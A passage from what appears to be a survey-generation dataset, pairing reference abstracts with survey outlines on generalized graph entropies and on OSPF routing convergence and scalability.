results. --- paper_title: Novel inequalities for generalized graph entropies - Graph energies and topological indices paper_content: The entropy of a graph is an information-theoretic quantity for measuring the complexity of a graph. After Shannon introduced the entropy to information and communication, many generalizations of the entropy measure have been proposed, such as Renyi entropy and Daroczy entropy. In this article, we prove accurate connections (inequalities) between generalized graph entropies, graph energies, and topological indices. Additionally, we obtain some extremal properties of nine generalized graph entropies by employing graph energies and topological indices. --- paper_title: Connections between generalized graph entropies and graph energy paper_content: Dehmer and Mowshowitz introduced a class of generalized graph entropies using known information-theoretic measures. These measures rely on assigning a probability distribution to a graph. In this article, we prove some extremal properties of such generalized graph entropies by using the graph energy and the spectral moments. Moreover, we study the relationships between the generalized graph entropies and compute the values of the generalized graph entropies for special graph classes. © 2014 Wiley Periodicals, Inc. Complexity 21: 35-41, 2015 --- paper_title: Entropy bounds for dendrimers paper_content: Abstract Many graph invariants have been used for the construction of entropy-based measures to characterize the structure of complex networks. When considering Shannon entropy-based graph measures, there has been very little work to find their extremal values. A reason for this might be the fact that Shannon’s entropy represents a multivariate function and all probability values are not equal to zero when considering graph entropies. Dehmer and Kraus proved some extremal results for graph entropies which are based on information functionals and express some conjectures generated by numerical simulations to find extremal values of graph entropies. Dehmer and Kraus discussed the extremal values of entropies for dendrimers. In this paper, we continue to study the extremal values of graph entropy for dendrimers, which has most interesting applications in molecular structure networks, and also in the pharmaceutical and biomedical area. Among all dendrimers with n vertices, we obtain the extremal values of graph entropy based on different well-known information functionals. Numerical experiments verifies our results. --- paper_title: Complexity of networks I: The set-complexity of binary graphs paper_content: The balance between symmetry and randomness as a property of networks can be viewed as a kind of “complexity.” We use here our previously defined “set complexity” measure (Galas et al., IEEE Trans Inf Theory 2010, 56), which was used to approach the problem of defining biological information, in the mathematical analysis of networks. This information theoretic measure is used to explore the complexity of binary, undirected graphs. The complexities, Ψ, of some specific classes of graphs can be calculated in closed form. Some simple graphs have a complexity value of zero, but graphs with significant values of Ψ are rare. We find that the most complex of the simple graphs are the complete bipartite graphs (CBGs). In this simple case, the complexity, Ψ, is a strong function of the size of the two node sets in these graphs. We find the maximum Ψ binary graphs as well. These graphs are distinct from, but similar to CBGs. Finally, we explore directed and stochastic processes for growing graphs (hill-climbing and random duplication, respectively) and find that node duplication and partial node duplication conserve interesting graph properties. Partial duplication can grow extremely complex graphs, while full node duplication cannot do so. By examining the eigenvalue spectrum of the graph Laplacian we characterize the symmetry of the graphs and demonstrate that, in general, breaking specific symmetries of the binary graphs increases the set-based complexity, Ψ. The implications of these results for more complex, multiparameter graphs, and for physical and biological networks and the processes of network evolution are discussed. © 2011 Wiley Periodicals, Inc. Complexity, 17,51–64, 2011 © 2011 Wiley Periodicals, Inc. --- paper_title: Encoding structural information uniquely with polynomial-based descriptors by employing the Randić matrix paper_content: In this paper we define novel graph measures based on the zeros of the characteristic polynomial by using the Randic matrix. We compute the novel graph descriptors on exhaustively generated graphs and trees and demonstrate that the measures encode their structural information uniquely. These results are compared with the same graph measures but based on the eigenvalues of the classical characteristic polynomial of a graph. Finally we interpret our findings that are evidenced by numerical results. --- paper_title: Generalized graph entropies paper_content: This article deals with generalized entropies for graphs. These entropies result from applying information measures to a graph using various schemes for defining probability distributions over the elements (e.g., vertices) of the graph. We introduce a new class of generalized measures, develop their properties, compute the measures for selected graphs, and briefly discuss potential applications to classification and clustering problems. © 2011 Wiley Periodicals, Inc. Complexity, 17,45–50, 2011 © 2011 Wiley Periodicals, Inc. --- paper_title: On Graph Entropy Measures for Knowledge Discovery from Publication Network Data paper_content: Many research problems are extremely complex, making interdisciplinary knowledge a necessity; consequently cooperative work in mixed teams is a common and increasing research procedure. In this paper, we evaluated information-theoretic network measures on publication networks. For the experiments described in this paper we used the network of excellence from the RWTH Aachen University, described in [1]. Those measures can be understood as graph complexity measures, which evaluate the structural complexity based on the corresponding concept. We see that it is challenging to generalize such results towards different measures as every measure captures structural information differently and, hence, leads to a different entropy value. This calls for exploring the structural interpretation of a graph measure [2] which has been a challenging problem. --- paper_title: A history of graph entropy measures paper_content: This survey seeks to describe methods for measuring the entropy of graphs and to demonstrate the wide applicability of entropy measures. Setting the scene with a review of classical measures for determining the structural information content of graphs, we discuss graph entropy measures which play an important role in a variety of problem areas, including biology, chemistry, and sociology. In addition, we examine relationships between selected entropy measures, illustrating differences quantitatively with concrete examples. --- paper_title: A note on the von Neumann entropy of random graphs paper_content: Abstract In this note, we consider the von Neumann entropy of a density matrix obtained by normalizing the combinatorial Laplacian of a graph by its degree sum. We prove that the von Neumann entropy of the typical Erdos–Renyi random graph saturates its upper bound. Since connected regular graphs saturate this bound as well, our result highlights a connection between randomness and regularity. A general interpretation of the von Neumann entropy of a graph is an open problem. --- paper_title: Complexity of networks II: The set complexity of edge-colored graphs paper_content: We previously introduced the concept of “set-complexity,” based on a context-dependent measure of information, and used this concept to describe the complexity of gene interaction networks. In a previous paper of this series we analyzed the set-complexity of binary graphs. Here, we extend this analysis to graphs with multicolored edges that more closely match biological structures like the gene interaction networks. All highly complex graphs by this measure exhibit a modular structure. A principal result of this work is that for the most complex graphs of a given size the number of edge colors is equal to the number of “modules” of the graph. Complete multipartite graphs (CMGs) are defined and analyzed. The relation between complexity and structure of these graphs is examined in detail. We establish that the mutual information between any two nodes in a CMG can be fully expressed in terms of entropy, and present an explicit expression for the set complexity of CMGs (Theorem 3). An algorithm for generating highly complex graphs from CMGs is described. We establish several theorems relating these concepts and connecting complex graphs with a variety of practical network properties. In exploring the relation between symmetry and complexity we use the idea of a similarity matrix and its spectrum for highly complex graphs. © 2012 Wiley Periodicals, Inc. Complexity, 2012 © 2012 Wiley Periodicals, Inc. --- paper_title: Structural information content of networks: Graph entropy based on local vertex functionals paper_content: In this paper we define the structural information content of graphs as their corresponding graph entropy. This definition is based on local vertex functionals obtained by calculating j-spheres via the algorithm of Dijkstra. We prove that the graph entropy and, hence, the local vertex functionals can be computed with polynomial time complexity enabling the application of our measure for large graphs. In this paper we present numerical results for the graph entropy of chemical graphs and discuss resulting properties. --- paper_title: A Large Scale Analysis of Information-Theoretic Network Complexity Measures Using Chemical Structures paper_content: This paper aims to investigate information-theoretic network complexity measures which have already been intensely used in mathematical- and medicinal chemistry including drug design. Numerous such measures have been developed so far but many of them lack a meaningful interpretation, e.g., we want to examine which kind of structural information they detect. Therefore, our main contribution is to shed light on the relatedness between some selected information measures for graphs by performing a large scale analysis using chemical networks. Starting from several sets containing real and synthetic chemical structures represented by graphs, we study the relatedness between a classical (partition-based) complexity measure called the topological information content of a graph and some others inferred by a different paradigm leading to partition-independent measures. Moreover, we evaluate the uniqueness of network complexity measures numerically. Generally, a high uniqueness is an important and desirable property when designing novel topological descriptors having the potential to be applied to large chemical databases. --- paper_title: On Entropy-based Molecular Descriptors : Statistical Analysis of Real and Synthetic Chemical Structures paper_content: This paper presents an analysis of entropy-based molecular descriptors. Specifically, we use real chemical structures, as well as synthetic isomeric structures, and investigate properties of and among descriptors with respect to the used data set by a statistical analysis. Our numerical results provide evidence that synthetic chemical structures are notably different to real chemical structures and, hence, should not be used to investigate molecular descriptors. Instead, an analysis based on real chemical structures is favorable. Further, we find strong hints that molecular descriptors can be partitioned into distinct classes capturing complementary information. --- paper_title: Entropy Bounds for Hierarchical Molecular Networks paper_content: In this paper we derive entropy bounds for hierarchical networks. More precisely, starting from a recently introduced measure to determine the topological entropy of non-hierarchical networks, we provide bounds for estimating the entropy of hierarchical graphs. Apart from bounds to estimate the entropy of a single hierarchical graph, we see that the derived bounds can also be used for characterizing graph classes. Our contribution is an important extension to previous results about the entropy of non-hierarchical networks because for practical applications hierarchical networks are playing an important role in chemistry and biology. In addition to the derivation of the entropy bounds, we provide a numerical analysis for two special graph classes, rooted trees and generalized trees, and demonstrate hereby not only the computational feasibility of our method but also learn about its characteristics and interpretability with respect to data analysis. --- paper_title: Novel topological descriptors for analyzing biological networks paper_content: Background ::: Topological descriptors, other graph measures, and in a broader sense, graph-theoretical methods, have been proven as powerful tools to perform biological network analysis. However, the majority of the developed descriptors and graph-theoretical methods does not have the ability to take vertex- and edge-labels into account, e.g., atom- and bond-types when considering molecular graphs. Indeed, this feature is important to characterize biological networks more meaningfully instead of only considering pure topological information. --- paper_title: Information processing in complex networks: Graph entropy and information functionals paper_content: This paper introduces a general framework for defining the entropy of a graph. Our definition is based on a local information graph and on information functionals derived from the topological structure of a given graph. More precisely, an information functional quantifies structural information of a graph based on a derived probability distribution. Such a probability distribution leads directly to an entropy of a graph. Then, the structural information content of a graph will be is interpreted and defined as the derived graph entropy. Another major contribution of this paper is the investigation of relationships between graph entropies. In addition to this, we provide numerical results demonstrating not only the feasibility of our method, which has polynomial time complexity, but also its usefulness with regard to practical applications aiming to an understanding of information processing in complex networks. --- paper_title: Inequalities for entropy-based measures of network information content paper_content: This paper presents a method for establishing relations between entropy-based measures applied to graphs. A special class of relations called implicit information inequalities or implicit entropy bounds is developed. A number of entropy-based measures of the structural information content of a graph have been developed over the past several decades, but little attention has been paid to relations among these measures. The research reported here aims to remedy this deficiency. --- paper_title: Uniquely Discriminating Molecular Structures Using Novel Eigenvalue-Based Descriptors paper_content: In this article, we explore novel spectra-based descriptors to discriminate molecular graphs. As known, classical structure descriptors based on the eigenvalues of the underlying adjacency matrix are often insufficient since there exist a large number of isospectral graphs. Briefly recall that the spectrum is the set of eigenvalues of the characteristic polynomial. To tackle the problem, we propose five families of novel descriptors based on the eigenvalues of certain molecular matrices representing chemical structures. Note that in this paper, we only consider the underlying skeleton of a molecular graph. Because it is crucial to study the discrimination power (often called degeneracy) by not merely using synthetic (isomeric) structures, we apply the novel measures to both real and synthetic molecular graphs. Also, we use ten different types of molecular matrices to calculate the novel descriptors and determine correlations between them. It turns out that the novel descriptors possess high discrimination power when being applied to appropriate molecular matrices. Evidently, the study also reveals that special kinds of matrices capture structural information of the molecular graphs more meaningfully than others, particularly the adjacency matrix which turned out often to be insufficient to develop molecular descriptors. --- paper_title: Exploring Statistical and Population Aspects of Network Complexity paper_content: The characterization and the definition of the complexity of objects is an important but very difficult problem that attracted much interest in many different fields. In this paper we introduce a new measure, called network diversity score (NDS), which allows us to quantify structural properties of networks. We demonstrate numerically that our diversity score is capable of distinguishing ordered, random and complex networks from each other and, hence, allowing us to categorize networks with respect to their structural complexity. We study 16 additional network complexity measures and find that none of these measures has similar good categorization capabilities. In contrast to many other measures suggested so far aiming for a characterization of the structural complexity of networks, our score is different for a variety of reasons. First, our score is multiplicatively composed of four individual scores, each assessing different structural properties of a network. That means our composite score reflects the structural diversity of a network. Second, our score is defined for a population of networks instead of individual networks. We will show that this removes an unwanted ambiguity, inherently present in measures that are based on single networks. In order to apply our measure practically, we provide a statistical estimator for the diversity score, which is based on a finite number of samples. --- paper_title: Information theoretic measures of UHG graphs with low computational complexity paper_content: We introduce a novel graph class we call universal hierarchical graphs (UHG) whose topology can be found numerously in problems representing, e.g., temporal, spacial or general process structures of systems. For this graph class we show, that we can naturally assign two probability distributions, for nodes and for edges, which lead us directly to the definition of the entropy and joint entropy and, hence, mutual information establishing an information theory for this graph class. Furthermore, we provide some results under which conditions these constraint probability distributions maximize the corresponding entropy. Also, we demonstrate that these entropic measures can be computed efficiently which is a prerequisite for every large scale practical application and show some numerical examples. ---
Title: A Survey of Recent Results in (Generalized) Graph Entropies Section 1: Introduction Description 1: Introduce the concept of graph entropy and its applications in various fields. Provide a historical overview and different approaches to measure graph entropy. Section 2: Inequalities and extremal properties on (generalized) graph entropies Description 2: Discuss the identity and inequality relationships between distinct graph entropies and study the extremal properties of graph entropies. Section 3: Inequalities for classical graph entropies and parametric measures Description 3: Present the bounds for special graph classes and study interrelations among classical and parametric graph entropy measures. Section 4: Graph entropy inequalities with information functions f_V, f_P, and f_C Description 4: Define information functions based on metrical properties and vertex centrality measures and derive related graph entropy measures. Section 5: Information theoretic measures of UHG graphs Description 5: Define and study the vertex and edge entropy of Universal Hierarchical Graphs (UHG) and their extremal properties. Section 6: Bounds for the entropies of rooted trees and generalized trees Description 6: Introduce and derive bounds for entropies of hierarchical and generalized trees, considering special classes of rooted trees. Section 7: Information inequalities for I_f(G) based on different information functions Description 7: Discuss closed-form expressions, bounds, and information inequalities of graph entropies based on specific information functions. Section 8: Extremal properties of degree-based and distance-based graph entropies Description 8: State the extremal properties of graph entropies based on degree powers and number of vertices at specific distances. Section 9: Extremality of I_f_lambda(G), I_f_2(G), I_f_3(G) and entropy bounds for dendrimers Description 9: Define specific graph entropies I_f_lambda(G), I_f_2(G), and I_f_3(G), and present their extremal properties and bounds for dendrimers. Section 10: Sphere-regular graphs and the extremality entropies I_f_2(G) and I_f_sigma(G) Description 10: Define sphere-regular graphs and study the properties and maximal graphs for sphere-function-based entropies. Section 11: Information inequalities for generalized graph entropies Description 11: Establish formal relationships between Shannon and Rényi entropies, and between classical and partition-independent entropy measures. Present bounds and inequalities for special graph classes and information functions. Section 12: Relationships between graph structures, graph energies, topological indices and generalized graph entropies Description 12: Introduce generalized graph entropies based on graph matrices, and explore their relationships with graph energies, spectral moments, and topological indices. Section 13: Summary and conclusion Description 13: Summarize the survey, highlighting the extremal properties, applications, and relationships among different (generalized) graph entropy measures. Mention open problems and conjectures for further research.
Improving Convergence Speed and Scalability in OSPF: A Survey
9
--- paper_title: The Birth of Link-State Routing paper_content: ‘‘Routing is a hard problem.’’ That’s what colleagues told me when I joined BBN in 1971, right after getting my undergraduate and master’s degrees in computer science at Harvard University. As a student, I had built the hardware and software to connect Harvard’s first interactive computer, the DEC PDP-1, to the infant Arpanet (the first packet switching computer network and precursor of the Internet). I had also taken a Harvard course taught by two senior BBN engineers who built the original interface message processors (IMPs), the switching nodes that routed traffic across the network. While at BBN, and with almost all the course requirements for a PhD in hand, it was time to find a possible dissertation topic. So I was glad to learn that dynamic routing—determining the best paths for network traffic in real time—was considered a difficult computer science issue because I planned to tackle it. By 1971, the Arpanet had been up and running long enough to disclose shortcomings in the performance and stability of the original design. My job at BBN was to redesign and rewrite all the software for the IMP, not just the routing module. I fondly recall releasing new IMP software to the whole network (amounting to a few dozen nodes at the time) every other Tuesday morning for two years. Fifty software versions later, the IMPs had more stable congestion management, better reliability, and higher throughput. But routing still remained a challenging area for further study. By the end of 1974 I had completed my PhD dissertation for Harvard on routing while working full-time at BBN. This dissertation described the problem, analyzed and compared many routing algorithms, and pointed out topics for further work, such as hierarchical routing for networks of networks. But I had not resolved some of the nagging network accidents, outages, and other crises caused by the original Arpanet routing system. --- paper_title: On the building blocks of quality of service in heterogeneous IP networks paper_content: After more than a decade of active research on Quality of Service in IP networks and the Internet, the majority of IP traffic relies on the conventional best-effort IP service model. Nevertheless, some QoS mechanisms are deployed in current networking infrastructures, while emerging applications pose QoS challenges. This survey brings into the foreground a broad range of research results on Quality of Service in IP-based networks. First, a justification of the need for QoS is provided, along with challenges stemming from the convergence of IP and wireless networks and the proliferation of QoS-demanding IP applications (such as VoIP). It is also emphasized that a global uniform end-to-end IP QoS solution is not realistic. Based on this remark, packet-level QoS mechanisms are classified as certain building blocks, each one fulfilling different objectives in certain parts of a heterogeneous IP network. This taxonomy, being in line with the ITU-T initiative toward a QoS architectural framework for IP networks, gives rise to a thorough presentation of QoS “building blocks,” as well as their associated mechanisms. This presentation is followed by an illustration of how the various building blocks are combined in the scope of modern IP networks. However, offering QoS in a large scale IP-based network demands that additional (i.e. non-packet-level) QoS mechanisms are deployed in some parts. Therefore, we also present prominent technologies and mechanisms devised to augment the QoS capabilities of access, wireless, and optical networks. We illustrate how these mechanisms boost end-to-end QoS solutions and reveal interworking issues with packet-level mechanisms. --- paper_title: A survey of QoS routing solutions for mobile ad hoc networks paper_content: In mobile ad hoc networks (MANETs), the provision of quality of service (QoS) guarantees is much more challenging than in wireline networks, mainly due to node mobility, multihop communications, contention for channel access, and a lack of central coordination. QoS guarantees are required by most multimedia and other time- or error-sensitive applications. The difficulties in the provision of such guarantees have limited the usefulness of MANETs. However, in the last decade, much research attention has focused on providing QoS assurances in MANET protocols. The QoS routing protocol is an integral part of any QoS solution since its function is to ascertain which nodes, if any, are able to serve applications? requirements. Consequently, it also plays a crucial role in data session admission control. This document offers an up-to-date survey of most major contributions to the pool of QoS routing solutions for MANETs published in the period 1997?2006. We include a thorough overview of QoS routing metrics, resources, and factors affecting performance and classify the protocols found in the literature. We also summarize their operation and describe their interactions with the medium access control (MAC) protocol, where applicable. This provides the reader with insight into their differences and allows us to highlight trends in protocol design and identify areas for future research. --- paper_title: Voice over the internet: A tutorial discussing problems and solutions associated with alternative transport paper_content: This article provides a tutorial overview of voice over the Internet, examining the effects of moving voice traffic over the packet switched Internet and comparing this with the effects of moving voice over the more traditional circuit-switched telephone system. The emphasis of this document is on areas of concern to a backbone service provider implementing Voice over IP (VoIP). We begin by providing overviews of the Plain Old Telephone Service (POTS) and VoIP. We then discuss techniques service providers can use to help preserve service quality on their VoIP networks. Next, we briefly discuss Voice over ATM (VoATM) as an alternative to VoIP. Finally, we offer some conclusions. --- paper_title: The New Routing Algorithm for the ARPANET paper_content: The new ARPANET routing algorithm is an improvement over the old procedure in that it uses fewer network resources, operates on more realistic estimates of network conditions, reacts faster to important network changes, and does not suffer from long-term loops or oscillations. In the new procedure, each node in the network maintains a database describing the complete network topology and the delays on all lines, and uses the database describing the network to generate a tree representing the minimum delay paths from a given root node to every other network node. Because the traffic in the network can be quite variable, each node periodically measures the delays along its outgoing lines and forwards this information to all other nodes. The delay information propagates quickly through the network so that all nodes can update their databases and continue to route traffic in a consistent and efficient manner. An extensive series of tests were conducted on the ARPANET, showing that line overhead and CPU overhead are both less than two percent, most nodes learn of an update within 100 ms, and the algorithm detects congestion and routes packets around congested areas. --- paper_title: OSPF: Anatomy of an Internet Routing Protocol paper_content: From the Publisher: ::: Written for TCP/IP network administrators, protocol designers, and network application developers, this book gives the most complete and practical view ever into the inner workings of Internet routing. The book focuses on OSPF (Open Shortest Path First), a common TCP/IP routing protocol that provides robust and efficient routing support in the most demanding Internet environments. A methodical and detailed description of the protocol is offered and OSPF's role within the wider context of a TCP/IP network is demonstrated. ::: Practical throughout, the book provides not only a theoretical description of Internet routing, but also a real-world look into how theory translates into practice. It shows how algorithms are implemented, and how the routing protocols function in a working network where transmission lines and routers routinely break down. ::: You will find clear explanations of such routing fundamentals as how a router forwards packets, IP addressing, CIDR (Classless Inter-Domain Routing), the routing table, Internet routing architecture, and the two main routing technologies: Distance Vector and link-state algorithms. OSPF is discussed in depth, with an examination of the rationale behind OSPF's design decisions and how it has evolved to keep pace with the rapidly changing Internet environment. OSPF topics covered by the book include the following: ::: OSPF areas and virtual links NBMA (Nonbroadcast multi-access) and Point-to-MultiPoint network segments OSPF configuration and management Interaction with other routing protocols OSPF cryptographic authentication OSPF protocol extensions, including the Demand Circuit extensions and the multicast extensions to OSPF (MOSPF) An OSPF FAQ ::: ::: IP multicast and multicast routing are also discussed. Methods for debugging routing problems are explained, including a catalog of available debugging tools. The book also offers side-by-side comparisons of all the unicast and multicast routing protocols currently in use in the Internet. ::: You will come away from this book with a sophisticated understanding of Internet routing and of the OSPF protocol in particular. Moreover, the book's practical focus will enable you to put this deeper understanding to work in your network environment. --- paper_title: Outage Analysis of a University Campus Network paper_content: Understanding outage and failure characteristics of a network is important to assess the availability of the network, determine failure source for trouble-shooting, and identify weak areas for network availability improvement. However, there has been virtually no failure measurement and analysis on access networks. In this paper, we carry out an in-depth outage and failure analysis of a university campus network using a rich set of both node outage and link failure data. We investigate the aspects of spatial and temporal localities of failures and outages, the relation of link failure and node outage, and the impact of the hierarchical and redundant network design on outage. We find most of link failure events are not caused by node failures; frequent link up-down events may not lead to the corresponding node's outage; for access layer switches that connect to end hosts, their link up-down events exhibit periodic patterns. --- paper_title: Optical Layer Monitoring Schemes for Fast Link Failure Localization in All-Optical Networks paper_content: Optical layer monitoring and fault localization serves as a critical functional module in the control and management of optical networks. An efficient monitoring scheme aims at minimizing not only the hardware cost required for 100% link failure localization, but also the number of redundant alarms and monitors such that the network fault management can be simplified as well. In recent years, several optical layer monitoring schemes were reported for fast and efficient link failure localization, including simple, non-simple monitoring cycle (m-cycle) and monitoring trail (m-trail). Optimal ILP (Integer Linear Program) models and heuristics were also proposed with smart design philosophy on flexibly trading off different objectives. This article summarizes those innovative ideas and methodologies with in-depth analysis on their pros and cons. We also provide insights on future research topics in this area, as well as possible ways for extending the new failure localization approaches to other network applications. --- paper_title: Impact of link failures on VoIP performance paper_content: We use active and passive traffic measurements to identify the issues involved in the deployment of a voice service over a tier-1 IP backbone network. Our findings indicate that no specific handling of voice packets (i.e. QoS differentiation) is needed in the current backbone but new protocols and mechanisms need to be introduced to provide a better protection against link failures. We discover that link failures may be followed by long periods of routing instability, during which packets can be dropped because forwarded along invalid paths. We also identify the need for a new family of quality of service mechanisms based on fast protection of traffic and high availability of the service rather than performance in terms of delay and loss. --- paper_title: Characterization of Failures in an Operational IP Backbone Network paper_content: As the Internet evolves into a ubiquitous communication infrastructure and supports increasingly important services, its dependability in the presence of various failures becomes critical. In this paper, we analyze IS-IS routing updates from the Sprint IP backbone network to characterize failures that affect IP connectivity. Failures are first classified based on patterns observed at the IP-layer; in some cases, it is possible to further infer their probable causes, such as maintenance activities, router-related and optical layer problems. Key temporal and spatial characteristics of each class are analyzed and, when appropriate, parameterized using well-known distributions. Our results indicate that 20% of all failures happen during a period of scheduled maintenance activities. Of the unplanned failures, almost 30% are shared by multiple links and are most likely due to router-related and optical equipment-related problems, respectively, while 70% affect a single link at a time. Our classification of failures reveals the nature and extent of failures in the Sprint IP backbone. Furthermore, our characterization of the different classes provides a probabilistic failure model, which can be used to generate realistic failure scenarios, as input to various network design and traffic engineering problems. --- paper_title: Stability issues in OSPF routing paper_content: We study the stability of the OSPF protocol under steady state and perturbed conditions. We look at three indicators of stability, namely, (a) network convergence times, (b) routing load on processors, and (c) the number of route flaps. We study these statistics under three different scenarios: (a) on networks that deploy OSPF with TE extensions, (b) on networks that use subsecond HELLO timers, and (c) on networks that use alternative strategies for refreshing link-state information. Our results are based on a very detailed simulation of a real ISP network with 292 nodes and 765 links. --- paper_title: Network Recovery: Protection and Restoration of Optical, SONET-SDH, IP, and MPLS paper_content: Chapter 1: Introduction 1.1 Communications networks today 1.2 Network reliability 1.3 Different phases in a recovery process 1.4 Performance of recovery mechanisms: criteria 1.5 Classification of single-layer recovery mechanisms 1.6 Multi-layer recovery 1.7 Conclusion Chapter 2: SONET-SDH 2.1 Introduction: transmission networks 2.2 SDH and SONET Networks 2.3 Operational aspects 2.4 Ring protection 2.5 Linear Protection 2.6 Restoration 2.7 Case study 2.8 Summary 2.9 Recommended reference work and research-related topics Chapter 3: Optical Networks 3.1 Evolution of the optical network layer 3.2. The Optical Transport Network 3.3 Fault detection and propagation 3.4 Recovery in optical networks 3.5 Recovery mechanisms in ring-based optical networks 3.6 Recovery mechanisms in mesh-based optical networks 3.7 Ring-based versus mesh-based recovery schemes 3.8 Availability 3.9 Som recent trends in research 3.10 Summary Chapter 4: IP Routing 4.1 IP routing protocols 4.2 Analysis of the IP recovery cycle 4.3 Failure profile and fault detection 4.4 Dampening algorithms 4.5 FIS propagation (LSA origination and flooding) 4.6 Route computation 4.7 Temporary loops during network states changes 4.8 Load balancing 4.9 QOS guarantees during failure 4.10 Non Stop Forwarding: an example with OSPF 4.11 A case study with IS-IS 4.12 Summary 4.13 Algorithm complexity 4.14 Incremental SPF 4.15 Interaction between fast IGP convergence and NSF 4.16 Research related topics Chapter 5: MPLS Traffic Engineering 5.1 MPLS Traffic Engineering refresher 5.2. Analysis of the recovery cycle 5.3. MPLS Traffic Engineering global default restoration 5.4 MPLS Traffic engineering global path protection 5.5 MPLS Traffic Engineering local protection 5.6. Another MPLS Traffic Engineering recovery alternative 5.7. Load balancing 5.8 Comparison of global protection and local protection 5.9 Revertive versus non revertive modes 5.10 Failure profiles and fault detection 5.11 Case Studies 5.12 Standardization 5.13 Summary 5.14 RSVP signaling extensions for MPLS TE local protection 5.15 Backup path computation 5.16 Research related topics Chapter 6 Multi-Layer Networks 6.1 ASON / GMPLS networks 6.2 Generic multi-layer recovery approaches 6.3 Case studies 6.4 Conclusion 6.5 References --- paper_title: Achieving faster failure detection in OSPF networks paper_content: A network running OSPF takes several tens of seconds to recover from a failure, using the current default parameter settings. The main component of this delay is the time required to detect a failure using the hello protocol. Reducing the value of the hellointerval can speed up the failure detection time. However, too small a value of the hellointerval can result in an increase in network congestion, potentially causing multiple consecutive hellos to be lost. This can lead to a false breakdown of adjacencies between routers. Such false alarms not only disrupt network traffic by causing unnecessary routing changes, but also increase the processing load on the routers, which may potentially lead to routing instability. In this paper, we investigate the following question - what is the optimal value for the hellointerval that will lead to fast failure detection in the network, while keeping occurrences of false alarms within acceptable limits? We examine the impact of both network congestion and the network topology on the optimal value for the hellointerval. Additionally, we investigate the effectiveness of faster failure detection in achieving fast failure recovery in OSPF networks. --- paper_title: The Birth of Link-State Routing paper_content: ‘‘Routing is a hard problem.’’ That’s what colleagues told me when I joined BBN in 1971, right after getting my undergraduate and master’s degrees in computer science at Harvard University. As a student, I had built the hardware and software to connect Harvard’s first interactive computer, the DEC PDP-1, to the infant Arpanet (the first packet switching computer network and precursor of the Internet). I had also taken a Harvard course taught by two senior BBN engineers who built the original interface message processors (IMPs), the switching nodes that routed traffic across the network. While at BBN, and with almost all the course requirements for a PhD in hand, it was time to find a possible dissertation topic. So I was glad to learn that dynamic routing—determining the best paths for network traffic in real time—was considered a difficult computer science issue because I planned to tackle it. By 1971, the Arpanet had been up and running long enough to disclose shortcomings in the performance and stability of the original design. My job at BBN was to redesign and rewrite all the software for the IMP, not just the routing module. I fondly recall releasing new IMP software to the whole network (amounting to a few dozen nodes at the time) every other Tuesday morning for two years. Fifty software versions later, the IMPs had more stable congestion management, better reliability, and higher throughput. But routing still remained a challenging area for further study. By the end of 1974 I had completed my PhD dissertation for Harvard on routing while working full-time at BBN. This dissertation described the problem, analyzed and compared many routing algorithms, and pointed out topics for further work, such as hierarchical routing for networks of networks. But I had not resolved some of the nagging network accidents, outages, and other crises caused by the original Arpanet routing system. --- paper_title: The New Routing Algorithm for the ARPANET paper_content: The new ARPANET routing algorithm is an improvement over the old procedure in that it uses fewer network resources, operates on more realistic estimates of network conditions, reacts faster to important network changes, and does not suffer from long-term loops or oscillations. In the new procedure, each node in the network maintains a database describing the complete network topology and the delays on all lines, and uses the database describing the network to generate a tree representing the minimum delay paths from a given root node to every other network node. Because the traffic in the network can be quite variable, each node periodically measures the delays along its outgoing lines and forwards this information to all other nodes. The delay information propagates quickly through the network so that all nodes can update their databases and continue to route traffic in a consistent and efficient manner. An extensive series of tests were conducted on the ARPANET, showing that line overhead and CPU overhead are both less than two percent, most nodes learn of an update within 100 ms, and the algorithm detects congestion and routes packets around congested areas. --- paper_title: Improving OSPF dynamics on a broadcast LAN paper_content: In this paper, we analyze OSPF's interface state machine and propose modifications in order to reduce the time/processing requirements of the leader election process in a broadcast LAN environment. The proposed modifications are based on dynamic adjustment of wait time duration rather than using a static value. --- paper_title: The New Routing Algorithm for the ARPANET paper_content: The new ARPANET routing algorithm is an improvement over the old procedure in that it uses fewer network resources, operates on more realistic estimates of network conditions, reacts faster to important network changes, and does not suffer from long-term loops or oscillations. In the new procedure, each node in the network maintains a database describing the complete network topology and the delays on all lines, and uses the database describing the network to generate a tree representing the minimum delay paths from a given root node to every other network node. Because the traffic in the network can be quite variable, each node periodically measures the delays along its outgoing lines and forwards this information to all other nodes. The delay information propagates quickly through the network so that all nodes can update their databases and continue to route traffic in a consistent and efficient manner. An extensive series of tests were conducted on the ARPANET, showing that line overhead and CPU overhead are both less than two percent, most nodes learn of an update within 100 ms, and the algorithm detects congestion and routes packets around congested areas. --- paper_title: Multi-point Relaying Techniques with OSPF on Ad Hoc Networks paper_content: Incorporating multi-hop ad hoc wireless networks in theIP infrastructure is an effort to which a growing communityparticipates. One instance of such activity is theextension of the most widely deployed interior gatewayrouting protocol on the Internet, OSPF (Open Shortest PathFirst), for operation on Mobile Ad hoc Networks (MANETs).Such extension allows OSPF to work on heterogeneousnetworks encompassing both wired and wireless routers,which may self-organize as multi-hop wireless subnetworks,and be mobile. Three solutions have been proposed for thisextension, among which two based on techniques derivedfrom multi-point relaying (MPR). This paper analyzes thesetwo approaches and identifies some fundamental discussionitems that pertain to adapting OSPF mechanisms to multihopwireless networking, before concluding with a proposalfor a unique, merged solution based on this analysis. --- paper_title: Improving OSPF dynamics on a broadcast LAN paper_content: In this paper, we analyze OSPF's interface state machine and propose modifications in order to reduce the time/processing requirements of the leader election process in a broadcast LAN environment. The proposed modifications are based on dynamic adjustment of wait time duration rather than using a static value. --- paper_title: On the building blocks of quality of service in heterogeneous IP networks paper_content: After more than a decade of active research on Quality of Service in IP networks and the Internet, the majority of IP traffic relies on the conventional best-effort IP service model. Nevertheless, some QoS mechanisms are deployed in current networking infrastructures, while emerging applications pose QoS challenges. This survey brings into the foreground a broad range of research results on Quality of Service in IP-based networks. First, a justification of the need for QoS is provided, along with challenges stemming from the convergence of IP and wireless networks and the proliferation of QoS-demanding IP applications (such as VoIP). It is also emphasized that a global uniform end-to-end IP QoS solution is not realistic. Based on this remark, packet-level QoS mechanisms are classified as certain building blocks, each one fulfilling different objectives in certain parts of a heterogeneous IP network. This taxonomy, being in line with the ITU-T initiative toward a QoS architectural framework for IP networks, gives rise to a thorough presentation of QoS “building blocks,” as well as their associated mechanisms. This presentation is followed by an illustration of how the various building blocks are combined in the scope of modern IP networks. However, offering QoS in a large scale IP-based network demands that additional (i.e. non-packet-level) QoS mechanisms are deployed in some parts. Therefore, we also present prominent technologies and mechanisms devised to augment the QoS capabilities of access, wireless, and optical networks. We illustrate how these mechanisms boost end-to-end QoS solutions and reveal interworking 